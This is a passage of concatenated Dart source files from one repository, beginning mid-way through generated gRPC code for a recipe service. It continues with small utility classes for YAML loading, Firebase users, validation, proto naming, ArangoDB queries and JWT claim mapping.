$2.G_GRecipeService_GetMainRecipeType_Parameters,
$2.G_GRecipeService_GetMainRecipeType_Return>(
'/GRecipeService/GetMainRecipeType',
($2.G_GRecipeService_GetMainRecipeType_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeType_Return.fromBuffer(value));
static final _$getMainRecipeTypeNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters,
$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>(
'/GRecipeService/GetMainRecipeTypeNullable',
($2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeTypeNullable_Return.fromBuffer(
value));
static final _$getRecipeTypeList = $grpc.ClientMethod<
$2.G_GRecipeService_GetRecipeTypeList_Parameters,
$2.G_GRecipeService_GetRecipeTypeList_Return>(
'/GRecipeService/GetRecipeTypeList',
($2.G_GRecipeService_GetRecipeTypeList_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeList_Return.fromBuffer(value));
static final _$getRecipeTypeListNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters,
$2.G_GRecipeService_GetRecipeTypeListNullable_Return>(
'/GRecipeService/GetRecipeTypeListNullable',
($2.G_GRecipeService_GetRecipeTypeListNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeListNullable_Return.fromBuffer(
value));
static final _$getListOfInts = $grpc.ClientMethod<
$2.G_GRecipeService_GetListOfInts_Parameters,
$2.G_GRecipeService_GetListOfInts_Return>(
'/GRecipeService/GetListOfInts',
($2.G_GRecipeService_GetListOfInts_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfInts_Return.fromBuffer(value));
static final _$getListOfIntsNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetListOfIntsNullable_Parameters,
$2.G_GRecipeService_GetListOfIntsNullable_Return>(
'/GRecipeService/GetListOfIntsNullable',
($2.G_GRecipeService_GetListOfIntsNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfIntsNullable_Return.fromBuffer(value));
static final _$doCalculation =
$grpc.ClientMethod<$3.GCalcParameters, $4.GCalcResult>(
'/GRecipeService/DoCalculation',
($3.GCalcParameters value) => value.writeToBuffer(),
($core.List<$core.int> value) => $4.GCalcResult.fromBuffer(value));
static final _$receiveLotsOfArgs = $grpc.ClientMethod<
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfArgs_Return>(
'/GRecipeService/ReceiveLotsOfArgs',
($2.G_GRecipeService_ReceiveLotsOfArgs_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfArgs_Return.fromBuffer(value));
static final _$receiveLotsOfNullableArgs = $grpc.ClientMethod<
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>(
'/GRecipeService/ReceiveLotsOfNullableArgs',
($2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return.fromBuffer(
value));
GRecipeServiceClient($grpc.ClientChannel channel,
{$grpc.CallOptions? options,
$core.Iterable<$grpc.ClientInterceptor>? interceptors})
: super(channel, options: options, interceptors: interceptors);
$grpc.ResponseFuture<$0.GRecipe> create($0.GRecipe request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$create, request, options: options);
}
$grpc.ResponseFuture<$0.GRecipe> update($0.GRecipe request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$update, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_Delete_Return> delete(
$1.GKey request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$delete, request, options: options);
}
$grpc.ResponseFuture<$0.GRecipe> get($1.GKey request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$get, request, options: options);
}
$grpc.ResponseFuture<$0.GListOfRecipe> search(
$2.G_GRecipeService_Search_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$search, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_SearchNullable_Return>
searchNullable($2.G_GRecipeService_SearchNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$searchNullable, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_InsertMany_Return> insertMany(
$0.GListOfRecipe request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$insertMany, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetNullable_Return> getNullable(
$2.G_GRecipeService_GetNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getNullable, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_Count_Return> count(
$2.G_GRecipeService_Count_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$count, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_CountNullable_Return> countNullable(
$2.G_GRecipeService_CountNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$countNullable, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_Reindex_Return> reindex(
$2.G_GRecipeService_Reindex_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$reindex, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetMainRecipeType_Return>
getMainRecipeType(
$2.G_GRecipeService_GetMainRecipeType_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getMainRecipeType, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable(
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getMainRecipeTypeNullable, request,
options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetRecipeTypeList_Return>
getRecipeTypeList(
$2.G_GRecipeService_GetRecipeTypeList_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getRecipeTypeList, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable(
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getRecipeTypeListNullable, request,
options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetListOfInts_Return> getListOfInts(
$2.G_GRecipeService_GetListOfInts_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getListOfInts, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetListOfIntsNullable_Return>
getListOfIntsNullable(
$2.G_GRecipeService_GetListOfIntsNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getListOfIntsNullable, request, options: options);
}
$grpc.ResponseFuture<$4.GCalcResult> doCalculation($3.GCalcParameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$doCalculation, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_ReceiveLotsOfArgs_Return>
receiveLotsOfArgs(
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$receiveLotsOfArgs, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs(
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$receiveLotsOfNullableArgs, request,
options: options);
}
}
abstract class GRecipeServiceBase extends $grpc.Service {
$core.String get $name => 'GRecipeService';
GRecipeServiceBase() {
$addMethod($grpc.ServiceMethod<$0.GRecipe, $0.GRecipe>(
'Create',
create_Pre,
false,
false,
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value),
($0.GRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$0.GRecipe, $0.GRecipe>(
'Update',
update_Pre,
false,
false,
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value),
($0.GRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$1.GKey, $2.G_GRecipeService_Delete_Return>(
'Delete',
delete_Pre,
false,
false,
($core.List<$core.int> value) => $1.GKey.fromBuffer(value),
($2.G_GRecipeService_Delete_Return value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$1.GKey, $0.GRecipe>(
'Get',
get_Pre,
false,
false,
($core.List<$core.int> value) => $1.GKey.fromBuffer(value),
($0.GRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_Search_Parameters,
$0.GListOfRecipe>(
'Search',
search_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_Search_Parameters.fromBuffer(value),
($0.GListOfRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_SearchNullable_Parameters,
$2.G_GRecipeService_SearchNullable_Return>(
'SearchNullable',
searchNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_SearchNullable_Parameters.fromBuffer(value),
($2.G_GRecipeService_SearchNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$0.GListOfRecipe,
$2.G_GRecipeService_InsertMany_Return>(
'InsertMany',
insertMany_Pre,
false,
false,
($core.List<$core.int> value) => $0.GListOfRecipe.fromBuffer(value),
($2.G_GRecipeService_InsertMany_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_GetNullable_Parameters,
$2.G_GRecipeService_GetNullable_Return>(
'GetNullable',
getNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetNullable_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_Count_Parameters,
$2.G_GRecipeService_Count_Return>(
'Count',
count_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_Count_Parameters.fromBuffer(value),
($2.G_GRecipeService_Count_Return value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_CountNullable_Parameters,
$2.G_GRecipeService_CountNullable_Return>(
'CountNullable',
countNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_CountNullable_Parameters.fromBuffer(value),
($2.G_GRecipeService_CountNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_Reindex_Parameters,
$2.G_GRecipeService_Reindex_Return>(
'Reindex',
reindex_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_Reindex_Parameters.fromBuffer(value),
($2.G_GRecipeService_Reindex_Return value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetMainRecipeType_Parameters,
$2.G_GRecipeService_GetMainRecipeType_Return>(
'GetMainRecipeType',
getMainRecipeType_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeType_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetMainRecipeType_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters,
$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>(
'GetMainRecipeTypeNullable',
getMainRecipeTypeNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters.fromBuffer(
value),
($2.G_GRecipeService_GetMainRecipeTypeNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetRecipeTypeList_Parameters,
$2.G_GRecipeService_GetRecipeTypeList_Return>(
'GetRecipeTypeList',
getRecipeTypeList_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeList_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetRecipeTypeList_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters,
$2.G_GRecipeService_GetRecipeTypeListNullable_Return>(
'GetRecipeTypeListNullable',
getRecipeTypeListNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters.fromBuffer(
value),
($2.G_GRecipeService_GetRecipeTypeListNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_GetListOfInts_Parameters,
$2.G_GRecipeService_GetListOfInts_Return>(
'GetListOfInts',
getListOfInts_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfInts_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetListOfInts_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetListOfIntsNullable_Parameters,
$2.G_GRecipeService_GetListOfIntsNullable_Return>(
'GetListOfIntsNullable',
getListOfIntsNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfIntsNullable_Parameters.fromBuffer(
value),
($2.G_GRecipeService_GetListOfIntsNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$3.GCalcParameters, $4.GCalcResult>(
'DoCalculation',
doCalculation_Pre,
false,
false,
($core.List<$core.int> value) => $3.GCalcParameters.fromBuffer(value),
($4.GCalcResult value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfArgs_Return>(
'ReceiveLotsOfArgs',
receiveLotsOfArgs_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters.fromBuffer(value),
($2.G_GRecipeService_ReceiveLotsOfArgs_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>(
'ReceiveLotsOfNullableArgs',
receiveLotsOfNullableArgs_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters.fromBuffer(
value),
($2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return value) =>
value.writeToBuffer()));
}
$async.Future<$0.GRecipe> create_Pre(
$grpc.ServiceCall call, $async.Future<$0.GRecipe> request) async {
return create(call, await request);
}
$async.Future<$0.GRecipe> update_Pre(
$grpc.ServiceCall call, $async.Future<$0.GRecipe> request) async {
return update(call, await request);
}
$async.Future<$2.G_GRecipeService_Delete_Return> delete_Pre(
$grpc.ServiceCall call, $async.Future<$1.GKey> request) async {
return delete(call, await request);
}
$async.Future<$0.GRecipe> get_Pre(
$grpc.ServiceCall call, $async.Future<$1.GKey> request) async {
return get(call, await request);
}
$async.Future<$0.GListOfRecipe> search_Pre($grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_Search_Parameters> request) async {
return search(call, await request);
}
$async.Future<$2.G_GRecipeService_SearchNullable_Return> searchNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_SearchNullable_Parameters>
request) async {
return searchNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_InsertMany_Return> insertMany_Pre(
$grpc.ServiceCall call, $async.Future<$0.GListOfRecipe> request) async {
return insertMany(call, await request);
}
$async.Future<$2.G_GRecipeService_GetNullable_Return> getNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetNullable_Parameters> request) async {
return getNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_Count_Return> count_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_Count_Parameters> request) async {
return count(call, await request);
}
$async.Future<$2.G_GRecipeService_CountNullable_Return> countNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_CountNullable_Parameters>
request) async {
return countNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_Reindex_Return> reindex_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_Reindex_Parameters> request) async {
return reindex(call, await request);
}
$async.Future<$2.G_GRecipeService_GetMainRecipeType_Return>
getMainRecipeType_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetMainRecipeType_Parameters>
request) async {
return getMainRecipeType(call, await request);
}
$async.Future<$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable_Pre(
$grpc.ServiceCall call,
$async.Future<
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters>
request) async {
return getMainRecipeTypeNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_GetRecipeTypeList_Return>
getRecipeTypeList_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetRecipeTypeList_Parameters>
request) async {
return getRecipeTypeList(call, await request);
}
$async.Future<$2.G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable_Pre(
$grpc.ServiceCall call,
$async.Future<
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters>
request) async {
return getRecipeTypeListNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_GetListOfInts_Return> getListOfInts_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetListOfInts_Parameters>
request) async {
return getListOfInts(call, await request);
}
$async.Future<$2.G_GRecipeService_GetListOfIntsNullable_Return>
getListOfIntsNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetListOfIntsNullable_Parameters>
request) async {
return getListOfIntsNullable(call, await request);
}
$async.Future<$4.GCalcResult> doCalculation_Pre(
$grpc.ServiceCall call, $async.Future<$3.GCalcParameters> request) async {
return doCalculation(call, await request);
}
$async.Future<$2.G_GRecipeService_ReceiveLotsOfArgs_Return>
receiveLotsOfArgs_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters>
request) async {
return receiveLotsOfArgs(call, await request);
}
$async.Future<$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs_Pre(
$grpc.ServiceCall call,
$async.Future<
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters>
request) async {
return receiveLotsOfNullableArgs(call, await request);
}
$async.Future<$0.GRecipe> create($grpc.ServiceCall call, $0.GRecipe request);
$async.Future<$0.GRecipe> update($grpc.ServiceCall call, $0.GRecipe request);
$async.Future<$2.G_GRecipeService_Delete_Return> delete(
$grpc.ServiceCall call, $1.GKey request);
$async.Future<$0.GRecipe> get($grpc.ServiceCall call, $1.GKey request);
$async.Future<$0.GListOfRecipe> search(
$grpc.ServiceCall call, $2.G_GRecipeService_Search_Parameters request);
$async.Future<$2.G_GRecipeService_SearchNullable_Return> searchNullable(
$grpc.ServiceCall call,
$2.G_GRecipeService_SearchNullable_Parameters request);
$async.Future<$2.G_GRecipeService_InsertMany_Return> insertMany(
$grpc.ServiceCall call, $0.GListOfRecipe request);
$async.Future<$2.G_GRecipeService_GetNullable_Return> getNullable(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetNullable_Parameters request);
$async.Future<$2.G_GRecipeService_Count_Return> count(
$grpc.ServiceCall call, $2.G_GRecipeService_Count_Parameters request);
$async.Future<$2.G_GRecipeService_CountNullable_Return> countNullable(
$grpc.ServiceCall call,
$2.G_GRecipeService_CountNullable_Parameters request);
$async.Future<$2.G_GRecipeService_Reindex_Return> reindex(
$grpc.ServiceCall call, $2.G_GRecipeService_Reindex_Parameters request);
$async.Future<$2.G_GRecipeService_GetMainRecipeType_Return> getMainRecipeType(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetMainRecipeType_Parameters request);
$async.Future<$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable($grpc.ServiceCall call,
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters request);
$async.Future<$2.G_GRecipeService_GetRecipeTypeList_Return> getRecipeTypeList(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetRecipeTypeList_Parameters request);
$async.Future<$2.G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable($grpc.ServiceCall call,
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters request);
$async.Future<$2.G_GRecipeService_GetListOfInts_Return> getListOfInts(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetListOfInts_Parameters request);
$async.Future<$2.G_GRecipeService_GetListOfIntsNullable_Return>
getListOfIntsNullable($grpc.ServiceCall call,
$2.G_GRecipeService_GetListOfIntsNullable_Parameters request);
$async.Future<$4.GCalcResult> doCalculation(
$grpc.ServiceCall call, $3.GCalcParameters request);
$async.Future<$2.G_GRecipeService_ReceiveLotsOfArgs_Return> receiveLotsOfArgs(
$grpc.ServiceCall call,
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters request);
$async.Future<$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs($grpc.ServiceCall call,
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters request);
}
<|start_filename|>grpc_host/lib/src/configuration/file_yaml_extension.dart<|end_filename|>
import 'dart:io';
import 'package:yaml/yaml.dart';
extension FileYamlExtension on File {
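  /// Reads this file and parses its contents as YAML.
  /// Returns `null` if the file does not exist.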
YamlMap? readYaml() {
if (!existsSync()) {
return null;
}
final text = readAsStringSync();
var map = loadYaml(text) as YamlMap?;
return map;
}
}
<|start_filename|>proto_mapper/test/lib/src/recipe_type.dart<|end_filename|>
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator_test/grpc/recipe_type.pbenum.dart';
part 'recipe_type.g.dart';
@proto
@mapProto
enum RecipeTypes {
cook,
grill,
fry,
stew,
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_user.dart<|end_filename|>
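/// Represents a Firebase user record with its profile, provider and claim data.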
class FirebaseUser {
final String? email;
final String? displayName;
final String? providerId;
final String? rawId;
final bool disabled;
final bool emailVerified;
final String? tenantId;
final List<dynamic>? providerUserInfo;
final int tokensValidAfterMillis;
final Map<String, dynamic>? userMetadata;
final Map<String, dynamic>? customClaims;
FirebaseUser({
required this.email,
required this.displayName,
required this.providerId,
required this.rawId,
required this.disabled,
required this.emailVerified,
required this.tokensValidAfterMillis,
this.providerUserInfo,
this.userMetadata,
this.customClaims,
required this.tenantId,
});
}
<|start_filename|>entity/test/lib/src/category.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'category.dart';
// **************************************************************************
// ValidatorGenerator
// **************************************************************************
class $CategoryValidator implements Validator {
const $CategoryValidator();
ValidationError? validateTitle(String value, {Category? entity}) {
if (value.isEmpty) {
return RequiredValidationError('title');
}
return null;
}
ValidationError? $validateTitle(String? value, {Category? entity}) {
if (value == null) {
return RequiredValidationError('title');
}
return validateTitle(value, entity: entity);
}
@override
ErrorList validate(covariant Category entity) {
var errors = <ValidationError>[];
ValidationError? error;
if ((error = validateTitle(entity.title, entity: entity)) != null) {
errors.add(error!);
}
return ErrorList(errors);
}
@override
void validateThrowing(covariant Category entity) {
var errors = validate(entity);
if (errors.validationErrors.isNotEmpty) throw errors;
}
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_services_generator_base.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
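/// Shared logic for the service generators: derives the service class name
/// from the annotated class name (stripping a trailing `Base` or `Interface`
/// suffix) and builds the names of the generated parameter/return messages.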
class ProtoServicesGeneratorBase {
final String className;
final ClassElement classElement;
final String prefix;
final String serviceClassName;
ProtoServicesGeneratorBase._({
required this.prefix,
required this.classElement,
required this.className,
}) : serviceClassName = className.endsWith('Base')
? className.substring(0, className.length - 4)
: className.endsWith('Interface')
? className.substring(0, className.length - 'Interface'.length)
: className;
ProtoServicesGeneratorBase({
required String prefix,
required ClassElement classElement,
}) : this._(
prefix: prefix,
classElement: classElement,
className: classElement.name,
);
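  /// Name of the generated protobuf message that carries the parameters of [methodName].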
String getParameterMessageName(String methodName) =>
'G_$prefix${serviceClassName}_${methodName}_Parameters';
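  /// Name of the generated protobuf message that carries the return value of [methodName].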
String getReturnMessageName(String methodName) =>
'G_$prefix${serviceClassName}_${methodName}_Return';
}
<|start_filename|>arango_driver/lib/src/query/line_if_then_else.dart<|end_filename|>
import 'query_text_fragment.dart';
/// A line of query text with a condition.
/// If [bool] `cond` is true, then [String] `whenTrue` will be pasted into the query.
/// Otherwise, [String] `whenFalse` will be pasted into the query.
/// Sample:
/// ```
/// Query([
/// Line('FOR doc in documents'),
/// LineIfThen(tag != null, 'FILTER doc.tags && POSITION( doc.tags, tag )'),
/// Line('SORT doc.datetime'),
/// LineIfThenElse(
/// without_content, 'return UNSET( doc, "content" )', 'return doc'),
/// ...
/// ])
/// ```
class LineIfThenElse extends QueryTextFragment {
LineIfThenElse(bool cond, String whenTrue, String whenFalse)
: super(cond ? whenTrue : whenFalse);
}
<|start_filename|>squarealfa_security/lib/src/jwt_payload.dart<|end_filename|>
/// Represents the payload content of a JWT token.
class JwtPayload {
final String subject;
final String email;
final String name;
final String issuer;
final String audience;
final DateTime notBefore;
final DateTime expires;
final bool emailVerified;
final bool isVerified;
final String tenantId;
final String tid;
final bool isAdministrator;
final List<String> permissions;
  /// Any other claims that are not represented
  /// by the properties above are stored in this map.
final Map<String, dynamic> extra;
const JwtPayload({
required this.subject,
required this.email,
required this.name,
required this.issuer,
required this.audience,
required this.notBefore,
required this.expires,
this.emailVerified = false,
this.isVerified = false,
this.tenantId = '',
this.tid = '',
this.permissions = const [],
this.isAdministrator = false,
this.extra = const <String, dynamic>{},
});
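  /// Creates a [JwtPayload] from a decoded JWT claims map, mapping the
  /// standard claim names (sub, email, iss, aud, nbf, exp, scp, adm, ...)
  /// to the corresponding properties and collecting any unrecognized
  /// claims into [extra].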
factory JwtPayload.fromMap(Map<String, dynamic> map) {
var name = '';
var subject = '';
var email = '';
var tenantId = '';
var tid = '';
var issuer = '';
var audience = '';
var permissions = const <String>[];
var isAdministrator = false;
var nbf = DateTime.now();
var exp = DateTime.now();
var emailVerified = false;
var extra = <String, dynamic>{};
for (var entry in map.entries) {
switch (entry.key) {
case 'name':
name = entry.value;
break;
case 'sub':
subject = entry.value;
break;
case 'email':
email = entry.value;
break;
case 'tid':
tid = entry.value ?? '';
break;
case 'tenantId':
tenantId = entry.value ?? '';
break;
case 'iss':
issuer = entry.value;
break;
case 'aud':
audience = entry.value;
break;
case 'nbf':
nbf = _getDateTime(entry.value.toString());
break;
case 'exp':
exp = _getDateTime(entry.value.toString());
break;
case 'scp':
permissions = entry.value as List<String>;
break;
case 'adm':
isAdministrator = entry.value;
break;
case 'email_verified':
emailVerified =
(entry.value.toString()).toLowerCase().trim() == 'true';
break;
default:
extra[entry.key] = entry.value;
break;
}
}
var payload = JwtPayload(
name: name,
subject: subject,
email: email,
issuer: issuer,
audience: audience,
notBefore: nbf,
expires: exp,
extra: extra,
emailVerified: emailVerified,
tenantId: tenantId,
tid: tid,
permissions: permissions,
isAdministrator: isAdministrator);
return payload;
}
JwtPayload copyWith({
String? subject,
String? email,
String? name,
String? issuer,
String? audience,
DateTime? notBefore,
DateTime? expires,
String? userId,
String? tenantId,
String? tid,
List<String>? roles,
bool? isVerified,
bool? emailVerified,
Map<String, dynamic>? extra,
}) {
var ret = JwtPayload(
subject: subject ?? this.subject,
email: email ?? this.email,
name: name ?? this.name,
issuer: issuer ?? this.issuer,
audience: audience ?? this.audience,
notBefore: notBefore ?? this.notBefore,
expires: expires ?? this.expires,
extra: extra ?? this.extra,
isVerified: isVerified ?? this.isVerified,
emailVerified: emailVerified ?? this.emailVerified,
tenantId: tenantId ?? this.tenantId,
tid: tid ?? this.tid,
);
return ret;
}
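  /// Builds the JWT claims map for this payload, emitting the standard
  /// claim names and omitting claims whose values are null or empty.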
Map<String, dynamic> get claimsMap {
var nbf = _getEpochSeconds(notBefore);
var exp = _getEpochSeconds(expires);
var map = <String, dynamic>{};
_addClaimIfNotNull(map, 'name', name);
_addClaimIfNotNull(map, 'sub', subject);
_addClaimIfNotNull(map, 'email', email);
_addClaimIfNotNull(map, 'iss', issuer);
_addClaimIfNotNull(map, 'aud', audience);
_addClaimIfNotNull(map, 'nbf', nbf);
_addClaimIfNotNull(map, 'exp', exp);
_addClaimIfNotNull(map, 'adm', isAdministrator);
_addClaimIfNotNull(map, 'scp', permissions);
_addClaimIfNotNullOrEmpty(map, 'tenantId', tenantId);
_addClaimIfNotNullOrEmpty(map, 'tid', tid);
for (var claim in extra.entries) {
_addClaimIfNotNull(map, claim.key, claim.value);
}
return map;
}
static String? _getEpochSeconds(DateTime? value) =>
value == null ? null : (value.millisecondsSinceEpoch ~/ 1000).toString();
static DateTime _getDateTime(String secondsAsString) {
var seconds = int.parse(secondsAsString);
var dt = DateTime.fromMillisecondsSinceEpoch(seconds * 1000);
return dt;
}
static void _addClaimIfNotNull(
Map<String, dynamic> claimsMap,
String claim,
dynamic value,
) {
if (value != null) claimsMap[claim] = value;
}
